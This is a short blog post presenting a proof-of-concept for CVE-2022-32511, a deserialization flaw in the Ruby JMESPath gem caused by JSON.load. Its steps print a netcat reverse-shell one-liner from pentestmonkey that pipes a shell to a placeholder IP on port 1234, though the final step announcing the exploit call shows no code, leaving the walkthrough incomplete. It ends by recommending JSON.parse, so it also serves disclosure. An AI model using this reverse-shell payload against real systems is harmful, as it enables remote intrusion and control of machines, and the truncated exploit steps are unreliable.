paint-brush
Here’s a Proof-Of-Concept for CVE-2022–32511 to Gain Remote Code Executionby@heydanny
802 reads
802 reads

Here’s a Proof-Of-Concept for CVE-2022–32511 to Gain Remote Code Execution

by Dhanesh DodiaJuly 25th, 2022
Read on Terminal Reader
Read this story w/o Javascript
tldt arrow

Too Long; Didn't Read

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of `JSON.load` which is considered unsafe when used with untrusted input. In order to reproduce the steps, we first require to install ‘JMESPath 1.6.0’ or before: Jmespath. Pick the desired payload, I have picked one from [pentestmonkey.net/cheat-sheet/shells/reverse-shells.
featured image - Here’s a Proof-Of-Concept for CVE-2022–32511 to Gain Remote Code Execution
Dhanesh Dodia HackerNoon profile picture

Description

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load, which is considered unsafe when used with untrusted input.



Proof-of-concept

  1. In order to reproduce the steps we first require to install ‘JMESPath 1.6.0’ or before:


jmespath


2. To import the library fire ‘Interactive Ruby Shell’ with the following mentioned command:

irb


3. In case you don’t have ‘irb’ installed then use the following command to download the same:

gem install IRB


4. Pick the desired payload, I have picked one from pentestmonkey:


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f


5. Finally, import the vulnerable ‘JMESPath’ library and supply the payload to execute the reverse shell:


Conclusion

It is recommended to use JSON.parse instead of JSON.load . In this case, we observed that the JSON.load has failed to validate the input data which leads to Remote Code Execution.